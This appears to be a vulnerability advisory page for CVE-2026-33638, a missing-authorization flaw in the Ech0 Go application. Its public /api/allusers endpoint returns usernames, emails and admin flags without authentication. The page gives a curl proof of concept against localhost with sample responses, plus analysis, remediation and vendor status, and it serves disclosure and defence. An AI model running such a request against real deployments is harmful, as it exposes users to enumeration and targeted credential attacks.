Skip to main content

Suse CVE-2026-33638

MEDIUM
Missing Authorization (CWE-862)
2026-03-24 https://github.com/lin-snow/Ech0
5.3
CVSS 3.1 · GitHub Advisory
Share

Severity by source

GitHub Advisory PRIMARY
5.3 MEDIUM
AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
SUSE
MEDIUM
qualitative

Primary rating from GitHub Advisory.

CVSS VectorGitHub Advisory

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Unchanged
Confidentiality
Low
Integrity
None
Availability
None

Lifecycle Timeline

3
Analysis Generated
Mar 24, 2026 - 22:31 vuln.today
Patch released
Mar 24, 2026 - 22:31 nvd
Patch available
CVE Published
Mar 24, 2026 - 22:25 nvd
MEDIUM 5.3

DescriptionGitHub Advisory

Summary

GET /api/allusers is mounted as a public endpoint and returns user records without authentication. This allows remote unauthenticated user enumeration and exposure of user profile metadata.

Details

The route is registered under public routes:

  • internal/router/user.go:17
  • appRouterGroup.PublicRouterGroup.GET("/allusers", h.UserHandler.GetAllUsers())

The handler itself is documented as requiring authentication:

  • internal/handler/user/user.go:177-185
  • API docs/annotations indicate auth requirement (@Security ApiKeyAuth).

PoC

1) Negative control: endpoint that should require auth

Request:

bash
curl -i "http://localhost:6277/api/user"

Response:

bash
HTTP/1.1 401 Unauthorized
Access-Control-Allow-Headers: *
Access-Control-Allow-Methods: POST, GET, OPTIONS, DELETE, PATCH, PUT
Access-Control-Expose-Headers: Content-Length, Access-Control-Allow-Origin, Access-Control-Allow-Headers, Content-Type
Cache-Control: no-store, no-cache, must-revalidate, proxy-revalidate, max-age=0
Content-Language: zh-CN
Content-Type: application/json; charset=utf-8
Expires: 0
Pragma: no-cache
Surrogate-Control: no-store
Date: Sun, 22 Mar 2026 07:21:22 GMT
Content-Length: 135

{"code":0,"msg":"未找到令牌,请点击右上角登录","error_code":"TOKEN_MISSING","message_key":"auth.token_missing","data":null}

2) Trigger: call public user-list endpoint without auth

Request:

bash
curl -i "http://localhost:6277/api/allusers"

Response:

bash
HTTP/1.1 200 OK
Access-Control-Allow-Headers: *
Access-Control-Allow-Methods: POST, GET, OPTIONS, DELETE, PATCH, PUT
Access-Control-Expose-Headers: Content-Length, Access-Control-Allow-Origin, Access-Control-Allow-Headers, Content-Type
Content-Language: zh-CN
Content-Type: application/json; charset=utf-8
Date: Sun, 22 Mar 2026 07:21:56 GMT
Content-Length: 912

{"code":1,"msg":"获取用户列表成功","data":[{"id":"019d144a-18fa-7db3-a2dd-310604210abd","username":"h1_poc_1774161893_1","email":"h1_poc_1774161893_1@example.com","is_admin":false,"is_owner":false,"avatar":"","locale":"zh-CN"},{"id":"019d144a-1904-7c0a-98ec-656079a82c64","username":"h1_poc_1774161893_2","email":"h1_poc_1774161893_2@example.com","is_admin":false,"is_owner":false,"avatar":"","locale":"zh-CN"},{"id":"019d144a-190b-70f8-89cb-4f8ab46cec9b","username":"h1_poc_1774161893_3","email":"h1_poc_1774161893_3@example.com","is_admin":false,"is_owner":false,"avatar":"","locale":"zh-CN"},{"id":"019d144a-e7dc-7cef-9395-4d0e392a5278","username":"alice","email":"alice@example.com","is_admin":false,"is_owner":false,"avatar":"","locale":"zh-CN"},{"id":"019d144a-e7e3-79f3-bb09-0ea758333a54","username":"bob","email":"bob@example.com","is_admin":false,"is_owner":false,"avatar":"","locale":"zh-CN"}]}

Impact

Vulnerability type: Access control bypass / unauthenticated data exposure. Who is impacted: Any deployment exposing the API to untrusted networks, and all users whose profile metadata can be enumerated. Business/security impact: Enables account reconnaissance and targeted credential attacks.

A fix is available at https://github.com/lin-snow/Ech0/releases/tag/v4.2.0.

AnalysisAI

The Ech0 application exposes an unauthenticated API endpoint GET /api/allusers that returns a complete list of user records including usernames, email addresses, and account metadata without requiring authentication. This allows remote attackers to enumerate all system users and gather profile information for reconnaissance and targeted attacks. A working proof-of-concept exists demonstrating the vulnerability, and a patch is available in version 4.2.0.

Technical ContextAI

The vulnerability exists in the Go-based Ech0 application (pkg:go/github.com_lin-snow_ech0) where the /api/allusers route is incorrectly registered under public routes in internal/router/user.go:17 despite handler documentation indicating an authentication requirement via @Security ApiKeyAuth annotation. This represents a CWE-862 (Missing Authorization) issue—the endpoint lacks proper access control checks at the routing layer, allowing unauthenticated requests to execute the GetAllUsers handler and return sensitive user profile data including user IDs (UUIDs), usernames, email addresses, administrative status flags, and locale preferences. The mismatch between documented security requirements and actual route registration created an authorization bypass condition.

RemediationAI

Upgrade Ech0 to version 4.2.0 or later immediately, which contains the authoritative patch (commit acbf1fd71011e6b9e1e6a911128056a19862f681 from https://github.com/lin-snow/Ech0/commit/acbf1fd71011e6b9e1e6a911128056a19862f681). The patch moves the /api/allusers endpoint from public routes to protected routes, reinstating the authentication requirement documented in the handler. For deployments unable to upgrade immediately, implement network-level access controls by restricting access to the /api/allusers endpoint via a reverse proxy (nginx, Apache, or cloud WAF) to trusted IP ranges only, and monitor access logs for suspicious enumeration attempts. Additionally, review deployment architecture to ensure the Ech0 API is not exposed directly to untrusted networks.

Vendor StatusVendor

SUSE

Severity: Medium
Product Status
openSUSE Leap 15.6 Fixed
SUSE Linux Enterprise Module for Package Hub 15 SP5 Fixed
SUSE Linux Enterprise Module for Package Hub 15 SP6 Fixed
openSUSE Leap 15.5 Fixed

Share

CVE-2026-33638 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy